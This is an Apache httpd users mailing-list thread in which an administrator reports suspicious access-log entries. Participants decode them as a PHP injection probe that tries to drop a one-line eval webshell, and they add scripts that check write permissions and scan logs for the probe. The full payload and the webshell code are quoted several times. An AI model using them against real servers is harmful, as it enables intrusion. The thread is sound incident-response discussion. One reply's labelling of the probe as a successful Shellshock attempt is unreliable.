Re: [users@httpd] am i hacked ?

2017-02-07 Thread Erik Dobák
With the current number of critters around, probably yes.
E

On 6 February 2017 at 23:05, Wim Lewis  wrote:

>
> On 2/6/2017 8:36 AM, Jack Swan wrote:
> > What upsets me is that these two requests have status code 200, which
> means it was successful.
>
> As Jonesy points out, it's normal for the web server to simply ignore a
> request's query-string in a request where it wouldn't mean anything. So
> Apache is happily returning the result of "GET /" and ignoring the
> malicious probe.
>
> If you don't have PHP installed, you're safe from whatever this is. If the
> user your webserver runs as can't write to the documentroot or
> configuration directory, you're safe from whatever this is.
>
>
>
> -
> To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org
> For additional commands, e-mail: users-h...@httpd.apache.org
>
>


Re: [users@httpd] am i hacked ?

2017-02-06 Thread Wim Lewis

On 2/6/2017 8:36 AM, Jack Swan wrote:
> What upsets me is that these two requests have status code 200, which means it 
> was successful.

As Jonesy points out, it's normal for the web server to simply ignore a 
request's query-string in a request where it wouldn't mean anything. So Apache 
is happily returning the result of "GET /" and ignoring the malicious probe.

If you don't have PHP installed, you're safe from whatever this is. If the user 
your webserver runs as can't write to the documentroot or configuration 
directory, you're safe from whatever this is. 



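Wim's second condition can be checked rather than assumed. The script below is an added example, not code posted in this thread: it walks a directory tree and lists every path whose POSIX mode bits would let the httpd run-as user write to it (for a directory, create an entry, which needs both w and x on it). The user name (wwwrun on SUSE, www-data on Debian, apache on Red Hat derived systems) and the directories on the usage line are assumptions to replace with what your httpd.conf says. Only owner/group/other bits are evaluated; POSIX ACLs, SELinux or AppArmor policy and chattr +i are not seen, so an empty report means the mode bits are right, not that nothing else could grant write access.

```python
"""List paths under a directory that the httpd run-as user could write to,
judged from POSIX owner/group/other mode bits.

Added example for this thread, not code from any participant.  It checks the
second of Wim's two conditions on a live tree: if the user httpd runs as can
write nowhere under DocumentRoot or the config directory, the probe's
file_put_contents() has nowhere to land.  ACLs, SELinux/AppArmor policy and
chattr +i are not consulted, so a clean report is necessary, not sufficient.
"""
import grp
import os
import pwd
import stat
import sys


def user_identity(username):
    """uid plus primary and supplementary gids of *username* (reads passwd/group on this host)."""
    pw = pwd.getpwnam(username)
    gids = {pw.pw_gid}
    gids.update(g.gr_gid for g in grp.getgrall() if username in g.gr_mem)
    return pw.pw_uid, gids


def perm_bits(mode, owner, group, uid, gids):
    """The rwx triple (3-bit int) the kernel applies for *uid* on an inode with
    these mode/owner/group values: owner class first, then group, then other."""
    if owner == uid:
        return (mode >> 6) & 0o7
    if group in gids:
        return (mode >> 3) & 0o7
    return mode & 0o7


def can_write(mode, owner, group, uid, gids):
    """True if *uid* may modify the inode.  uid 0 always may (CAP_DAC_OVERRIDE).
    For a directory "write" means creating or deleting entries, which needs w and x."""
    if uid == 0:
        return True
    bits = perm_bits(mode, owner, group, uid, gids)
    if stat.S_ISDIR(mode):
        return (bits & 0o3) == 0o3
    return bool(bits & 0o2)


def find_writable(root, uid, gids):
    """Walk *root* (not following symlinks) and return the sorted paths *uid* could write to."""
    found = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in filenames]:
            try:
                st = os.lstat(path)
            except OSError:
                continue            # vanished or unreadable: skip rather than guess
            if stat.S_ISLNK(st.st_mode):
                continue            # a link's own bits mean nothing; its target is judged where it lives
            if can_write(st.st_mode, st.st_uid, st.st_gid, uid, gids):
                found.append(path)
    return sorted(found)


if __name__ == "__main__":
    # usage: python check_writable.py wwwrun /srv/www/htdocs /etc/apache2   (names are examples)
    if len(sys.argv) < 3:
        sys.exit("usage: check_writable.py <httpd-user> <dir> [<dir> ...]")
    uid, gids = user_identity(sys.argv[1])
    for root in sys.argv[2:]:
        hits = find_writable(root, uid, gids)
        print(f"{root}: {len(hits)} path(s) writable by {sys.argv[1]}")
        for path in hits:
            print("  ", path)
```

Run it as root (or any user that can stat the whole tree) against DocumentRoot and the configuration directory; an empty report is the result you want. Wim's first condition is a one-liner by comparison: `apachectl -M` lists the loaded modules, and no php module there means mod_php never sees the query string, though PHP reached through CGI or FastCGI would not show up in that list and has to be ruled out separately.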



Re: [users@httpd] am i hacked ?

2017-02-06 Thread Kent Frazier

If you have python installed...
The following python script shows some simple commands for decoding (for 
future reference).


import base64
import urllib.parse

# The two access_log entries from Bernd's mail, re-joined where the mail
# client wrapped them mid-token.
test = """\
91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90"""

# Undo the %XX URL encoding of the request lines ...
print(urllib.parse.unquote(test))
# ... and decode the base64 literal that file_put_contents() would write out.
print(base64.b64decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'))

It yields...
python unquote.py
91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; HTTP/1.1" 200 90
b'<?php eval($_POST[1]);?>'

I also have a program that attempts to get an email address to notify in 
the event of abuse. It yields the following.


python getAbuseEmail.py 91.200.12.33
['n...@lugalink.net']

though it is unlikely you'll get a response ;-)


On 2/6/2017 8:36 AM, Jack Swan wrote:

I didn't decode it all.  I'll leave the rest up to you, but the %characters are 
hexadecimal characters.  Look up hex charset.

So the first line translates to (I may have missed a char or two...)

GET /?1=@ini_set("display_errors", 
0);set_time_limit("0");@set_magic_quotes_runtime();echo  
'->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
 '|<-';


- Original Message -
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
Subject: [users@httpd] am i hacked ?

Hi,

Just now I found two very weird entries in my access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90

What upsets me is that these two requests have status code 200, which means it 
was successful.
The IP is from Ukraine. Where can I find out what these %characters mean? 
Does anyone understand what happened here? It's Apache 2.2.3 64bit.

Thanks for any hint.

Bernd







Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd


- On Feb 6, 2017, at 8:22 PM, Bernd Lentes 
bernd.len...@helmholtz-muenchen.de wrote:

>> OK. I think I understand most of it.
>> First the attacker sets some values appropriate for him. Then he tries to 
>> create a file webconfig.txt.php and to write
>> <?php eval($_POST[1]);?> in it.
>> Fortunately wwwrun can't write in /srv/www ..., following
>> http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
>> If he could create the file, then he is able to send arbitrary stuff to it 
>> which is executed by eval.
>> 
>> Some things are still unclear for me:
>> 
>> What is the purpose of the two echos?
>> Why has the request status code 200?
>> What is the purpose of the 1 directly behind the question mark?
>> What is the 1 in the array $_POST? Arrays start with index 0, I think (I'm 
>> not a PHP developer).
>> 
> 
> The @ in front of the function calls silence the errors:
> http://stackoverflow.com/questions/27645422/what-difference-does-usage-of-symbol-with-ini-set-built-in-function-makes-in
> 

Besides keeping Apache and the OS fresh, what do you think of mod_security 
and/or AppArmor as an additional layer of security?
I read that mod_security is quite complicated.


Bernd
 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671





Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd

> OK. I think I understand most of it.
> First the attacker sets some values appropriate for him. Then he tries to 
> create a file webconfig.txt.php and to write
> <?php eval($_POST[1]);?> in it.
> Fortunately wwwrun can't write in /srv/www ..., following
> http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
> If he could create the file, then he is able to send arbitrary stuff to it 
> which is executed by eval.
> 
> Some things are still unclear for me:
> 
> What is the purpose of the two echos?
> Why has the request status code 200?
> What is the purpose of the 1 directly behind the question mark?
> What is the 1 in the array $_POST? Arrays start with index 0, I think (I'm 
> not a PHP developer).
> 

The @ in front of the function calls silence the errors:
http://stackoverflow.com/questions/27645422/what-difference-does-usage-of-symbol-with-ini-set-built-in-function-makes-in

Bernd
 






Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd


- On Feb 6, 2017, at 6:32 PM, Bernd Lentes 
bernd.len...@helmholtz-muenchen.de wrote:

> - On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote:
> 
>> The first line is trying to create the file webconfig.txt.php in your
>> DOCUMENT_ROOT directory, with the contents of the file being:
>> 
>> <?php eval($_POST[1]);?>
>> 
>> I didn't decode the remaining lines. I think they're just trying to do the 
>> same thing.
>> 
>> 
> 
> You are right. It's the base64 decoded stuff. https://www.base64decode.org/ is
> helpful.
> 
> 

OK. I think I understand most of it.
First the attacker sets some values appropriate for him. Then he tries to 
create a file webconfig.txt.php and to write
<?php eval($_POST[1]);?> in it.
Fortunately wwwrun can't write in /srv/www ..., following 
http://httpd.apache.org/docs/2.2/misc/security_tips.html years ago.
If he could create the file, then he is able to send arbitrary stuff to it 
which is executed by eval.

Some things are still unclear for me:

What is the purpose of the two echos?
Why has the request status code 200?
What is the purpose of the 1 directly behind the question mark?
What is the 1 in the array $_POST? Arrays start with index 0, I think (I'm not 
a PHP developer).


Bernd

 






Re: [users@httpd] am i hacked ?

2017-02-06 Thread Eric Covener
On Mon, Feb 6, 2017 at 12:30 PM, Mitchell Krog  wrote:
> I see these types of attack strings all the time on Nginx, except Nginx gives
> a 403. Apache is notoriously bad with security and giving 200 OK responses
> makes you  yourself. A reason I and many other people have switched.
> User support on this list was also non-existent when I ran into serious SSL
> problems with 2.4 that until today have been ignored and unanswered.

Was this your serious problem:

I am hoping someone can please give me a more concise description of
what the socache_shmcb module is and what it actually does. The
documentation at
https://httpd.apache.org/docs/2.4/mod/mod_socache_shmcb.html is very
vague and in 2 years has not changed. Google searches do not reveal
much information other than people on forums saying enable the module
for better performance and what not.

I just cannot get my head around what it is actually really designed
to do and if one was to use it how to configure it. Guess as I said it
will first help to know what it actually is.




Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd

- On Feb 6, 2017, at 5:54 PM, Jack Swan john.s...@oracle.com wrote:

> The first line is trying to create the file webconfig.txt.php in your
> DOCUMENT_ROOT directory, with the contents of the file being:
> 
> <?php eval($_POST[1]);?>
> 
> I didn't decode the remaining lines. I think they're just trying to do the 
> same thing.
> 
> 

You are right. It's the base64 decoded stuff. https://www.base64decode.org/ is 
helpful.


Bernd
 






Re: [users@httpd] am i hacked ?

2017-02-06 Thread Mitchell Krog
I see these types of attack strings all the time on Nginx, except Nginx gives
a 403. Apache is notoriously bad with security and giving 200 OK responses
makes you  yourself. A reason I and many other people have switched.
User support on this list was also non-existent when I ran into serious SSL
problems with 2.4 that until today have been ignored and unanswered.

On 06 Feb 2017 19:21, "Ken Robinson"  wrote:

>
>
> On 2017-02-06 12:08 pm, Lentes, Bernd wrote:
>
>>> The first line is trying to create the file webconfig.txt.php in your
>>> DOCUMENT_ROOT directory, with the contents of the file being:
>>>
>>> <?php eval($_POST[1]);?>
>>>
>>> I didn't decode the remaining lines. I think they're just trying to do
>>> the same thing.
>>>
>>
>> Fortunately there is no webconfig.txt.php. And all folders in /srv/www
>> belong to root and user wwwrun is not allowed to write there.
>>
>
> What seems to be happening here is that your system is being probed for
> vulnerabilities.
>
> The attacker is sending a payload string to your index.php file in hopes
> that it will not complain and write the string to the file
> webconfig.txt.php which the attacker would then attempt to get to with the
> real hack in the Posted contents. Are there any requests to get to that
> file?
>
> You should make sure you sanitize any input to your index.php and reject
> anything that's not expected.
>
> Ken
>
>
>


Re: [users@httpd] am i hacked ?

2017-02-06 Thread Ken Robinson



On 2017-02-06 12:08 pm, Lentes, Bernd wrote:

>> The first line is trying to create the file webconfig.txt.php in your
>> DOCUMENT_ROOT directory, with the contents of the file being:
>>
>> <?php eval($_POST[1]);?>
>>
>> I didn't decode the remaining lines. I think they're just trying to do 
>> the same thing.
>
> Fortunately there is no webconfig.txt.php. And all folders in /srv/www 
> belong to root and user wwwrun is not allowed to write there.


What seems to be happening here is that your system is being probed for 
vulnerabilities.


The attacker is sending a payload string to your index.php file in hopes 
that it will not complain and write the string to the file 
webconfig.txt.php which the attacker would then attempt to get to with 
the real hack in the Posted contents. Are there any requests to get to 
that file?


You should make sure you sanitize any input to your index.php and 
reject anything that's not expected.


Ken

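Ken's question, whether anything later asked for webconfig.txt.php, is the check that separates a failed probe from a successful one, and the same access_log answers it. The script below is an added example, not code posted in this thread. It parses each log line, URL-decodes the query values, flags values that carry the dropper pattern (file_put_contents with a base64_decode body, framed by the '->|' and '|<-' markers the probe echoes around its output so whoever sent it can locate the result in the response), recovers the target path, decodes the base64 body, and then lists every request for that path. The probe puts PHP source in the `1` query parameter and counts on some script on the host feeding it to eval(); an Apache that just serves / and logs a 200, which is Wim's point, is what the first two sample lines show. Those two lines are Bernd's, re-joined where his mail client wrapped them; the other two sample lines are constructed (an ordinary visitor and a hypothetical POST to the dropped file that got a 404) and exist only to exercise the follow-up check. The regex assumes Bernd's LogFormat, with one extra numeric field before the quoted request, and also accepts the plain common/combined layout.

```python
"""Find the webshell-dropper probe in an Apache access_log and report whether
the file it tried to create was ever requested afterwards.  Added example for
this thread, not code from any participant; only the two probe lines are real
(Bernd's, re-joined where his mail client wrapped them), the other two
SAMPLE_LOG lines are constructed to exercise the follow-up check."""
import base64
import binascii
import re
from urllib.parse import unquote, unquote_plus, urlsplit

PROBE_1 = ('91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B'
           '%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28'
           '%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B'
           '%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90')
PROBE_2 = PROBE_1.replace("16:43:26 +0100] 236", "16:44:33 +0100] 253")
SAMPLE_LOG = "\n".join([
    PROBE_1,
    PROBE_2,
    # constructed: an ordinary visitor, must not be flagged
    '10.0.0.7 - - [06/Feb/2017:16:50:01 +0100] 120 "GET /index.html HTTP/1.1" 200 1532',
    # constructed: a hypothetical return visit to the dropped shell; here the drop had failed
    '91.200.12.33 - - [06/Feb/2017:16:52:48 +0100] 88 "POST /webconfig.txt.php HTTP/1.1" 404 290',
])

# host ident user [time] <optional extra field, as in Bernd's LogFormat> "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] (?:\S+ )?'
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)
# Pieces of the dropper that survive URL decoding; eval()/$_POST sit inside the base64 body
INDICATORS = ("file_put_contents", "base64_decode", "->|", "|<-", "eval(", "$_POST", "$_GET")
DROP_PATH_RE = re.compile(r"file_put_contents\(\s*\$_SERVER\['DOCUMENT_ROOT'\]\s*\.\s*'(/[^']+)'")
B64_RE = re.compile(r"base64_decode\('([A-Za-z0-9+/=]+)'\)")

def parse_line(line):
    """Split one access_log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def query_values(target):
    """URL-decoded (key, value) pairs of the target's query string.  Split on '&' by hand:
    parse_qs() before Python 3.9.2 also split on ';', which would chop this PHP payload."""
    pairs = []
    for pair in urlsplit(target).query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            pairs.append((unquote(key), unquote_plus(value)))
    return pairs

def analyse_value(value):
    """Indicator hits, dropped path and decoded body for one decoded value, or None."""
    hits = [i for i in INDICATORS if i in value]
    if len(hits) < 2:                       # a single hit is too weak to report
        return None
    info = {"indicators": hits, "dropped_path": None, "dropped_body": None}
    m = DROP_PATH_RE.search(value)
    if m:
        info["dropped_path"] = m.group(1)
    m = B64_RE.search(value)
    if m:
        try:
            info["dropped_body"] = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            pass                            # not real base64; keep the indicators only
    return info

def scan_log(text):
    """Return (probes, follow_ups): flagged requests, and any request for a path a probe tried to drop."""
    entries = [e for e in map(parse_line, text.splitlines()) if e]
    probes = []
    for e in entries:
        for _key, value in query_values(e["target"]):
            info = analyse_value(value)
            if info:
                probes.append({**e, **info})
                break
    dropped = {p["dropped_path"] for p in probes if p["dropped_path"]}
    follow_ups = [e for e in entries if urlsplit(e["target"]).path in dropped]
    return probes, follow_ups

def verdict(follow_ups):
    """Ken's question in one token: was the dropped file requested, and was it served?"""
    if not follow_ups:
        return "not_requested"
    if any(f["status"].startswith("2") for f in follow_ups):
        return "requested_and_served"       # the drop worked; treat the host as compromised
    return "requested_not_found"

if __name__ == "__main__":
    probes, follow_ups = scan_log(SAMPLE_LOG)   # swap in open("access_log").read() for a real run
    for p in probes:
        print(f"{p['ts']} {p['ip']} dropper -> {p['dropped_path']} body={p['dropped_body']!r}")
    for f in follow_ups:
        print(f"{f['ts']} {f['ip']} {f['method']} {f['target']} -> {f['status']}")
    print("verdict:", verdict(follow_ups))
```

On the sample data the two probes decode to a drop of /webconfig.txt.php containing `<?php eval($_POST[1]);?>`, and the only follow-up got a 404, which is the "no such file" outcome Bernd saw. A 200 on a follow-up is the one line in the log that would turn "probed" into "compromised", and on a real server it is worth grepping the whole retention window for, not just the minutes after the probe.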



Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd


> The first line is trying to create the file webconfig.txt.php in your
> DOCUMENT_ROOT directory, with the contents of the file being:
> 
> <?php eval($_POST[1]);?>
> 
> I didn't decode the remaining lines. I think they're just trying to do the 
> same thing.
> 

Fortunately there is no webconfig.txt.php. And all folders in /srv/www belong 
to root and user wwwrun is not allowed to write there.


Bernd
 






Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd

- On Feb 6, 2017, at 5:45 PM, Daniel dferra...@gmail.com wrote:

> Actually now that I re-read the requests it also looks like a successful
> Shellshock attempt.
> Operating system software not updated recently either?

> 2017-02-06 17:42 GMT+01:00 Daniel < dferra...@gmail.com > :

>> Have you tried to send those requests yourself and see what you get?
>> Still those requests seem to be aimed at your php framework.

>> Do you use a very old php version as well?

Everything is old: PHP, OS, Apache. That's on me. It's a system I nearly 
overlooked, because we use it very rarely.
But nevertheless, it should be updated. I know. And I learn.

>>> What I found out already:
>>> https://url-encoder.de/ helped me to decode the URL:
>>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';

>>> Currently I don't understand what this means.
>>> I don't find a file webconfig.txt.php on my system.
>>> Currently no weird process, no new user in /etc/passwd, no packets to the
>>> network which include this IP.

>>> Thankful for any tip.

 






Re: [users@httpd] am i hacked ?

2017-02-06 Thread Jack Swan

The first line is trying to create the file webconfig.txt.php in your 
DOCUMENT_ROOT directory, with the contents of the file being:

<?php eval($_POST[1]);?>

I didn't decode the remaining lines. I think they're just trying to do the same 
thing.


- Original Message -
From: bernd.len...@helmholtz-muenchen.de
To: users@httpd.apache.org
Sent: Monday, February 6, 2017 11:41:13 AM GMT -05:00 US/Canada Eastern
Subject: Re: [users@httpd] am i hacked ?


- On Feb 6, 2017, at 5:14 PM, Bernd Lentes 
bernd.len...@helmholtz-muenchen.de wrote:

> Hi,
> 
> Just now I found two very weird entries in my access_log:
> 
> 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
> 
> What upsets me is that these two requests have status code 200, which means it 
> was successful.
> The IP is from Ukraine. Where can I find out what these %characters mean? 
> Does anyone understand what happened here? It's Apache 2.2.3 64bit.
> 
> Thanks for any hint.
> 
> Bernd
> 

What I found out already:
https://url-encoder.de/ helped me to decode the URL:
/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';

Currently I don't understand what this means.
I don't find a file webconfig.txt.php on my system.
Currently no weird process, no new user in /etc/passwd, no packets to the 
network which include this IP.

Thankful for any tip.


Bernd
 






Re: [users@httpd] am i hacked ?

2017-02-06 Thread Daniel
Actually now that I re-read the requests it also looks like a successful
Shellshock attempt.

Operating system software not updated recently either?

2017-02-06 17:42 GMT+01:00 Daniel :

> Have you tried to send those requests yourself and see what you get?
>
> Still those requests seem to be aimed at your php framework.
>
> Do you use a very old php version as well?
>
> 2017-02-06 17:41 GMT+01:00 Lentes, Bernd  muenchen.de>:
>
>>
>> - On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-
>> muenchen.de wrote:
>>
>> > Hi,
>> >
>> > Just now I found two very weird entries in my access_log:
>> >
>> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
>> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
>> >
>> > What upsets me is that these two requests have status code 200, which
>> > means it was successful.
>> > The IP is from Ukraine. Where can I find out what these %characters
>> > mean? Does anyone understand what happened here? It's Apache 2.2.3 64bit.
>> >
>> > Thanks for any hint.
>> >
>> > Bernd
>> >
>>
>> What I found out already:
>> https://url-encoder.de/ helped me to decode the URL:
>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
>>
>> Currently I don't understand what this means.
>> I don't find a file webconfig.txt.php on my system.
>> Currently no weird process, no new user in /etc/passwd, no packets to the
>> network which include this IP.
>>
>> Thankful for any tip.
>>
>>
>> Bernd
>>
>>
>>
>>
>>
>>
>
>
> --
> *Daniel Ferradal*
> IT Specialist
>
> email dferradal at gmail.com
> linkedin es.linkedin.com/in/danielferradal
>





Re: [users@httpd] am i hacked ?

2017-02-06 Thread Daniel
Have you tried to send those requests yourself and see what you get?

Still those requests seem to be aimed at your php framework.

Do you use a very old php version as well?

2017-02-06 17:41 GMT+01:00 Lentes, Bernd :

>
> - On Feb 6, 2017, at 5:14 PM, Bernd Lentes bernd.lentes@helmholtz-
> muenchen.de wrote:
>
> > Hi,
> >
> > Just now I found two very weird entries in my access_log:
> >
> > 91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
> > 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90
> >
> > What upsets me is that these two requests have status code 200, which
> > means it was successful.
> > The IP is from Ukraine. Where can I find out what these %characters
> > mean? Does anyone understand what happened here? It's Apache 2.2.3 64bit.
> >
> > Thanks for any hint.
> >
> > Bernd
> >
>
> What I found out already:
> https://url-encoder.de/ helped me to decode the URL:
> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
>
> Currently I don't understand what this means.
> I don't find a file webconfig.txt.php on my system.
> Currently no weird process, no new user in /etc/passwd, no packets to the
> network which include this IP.
>
> Thankful for any tip.
>
>
> Bernd
>
>
>
>
>
>




Re: [users@httpd] am i hacked ?

2017-02-06 Thread Lentes, Bernd

- On Feb 6, 2017, at 5:14 PM, Bernd Lentes 
bernd.len...@helmholtz-muenchen.de wrote:

> Hi,
> 
> Just now I found two very weird entries in my access_log:
> 
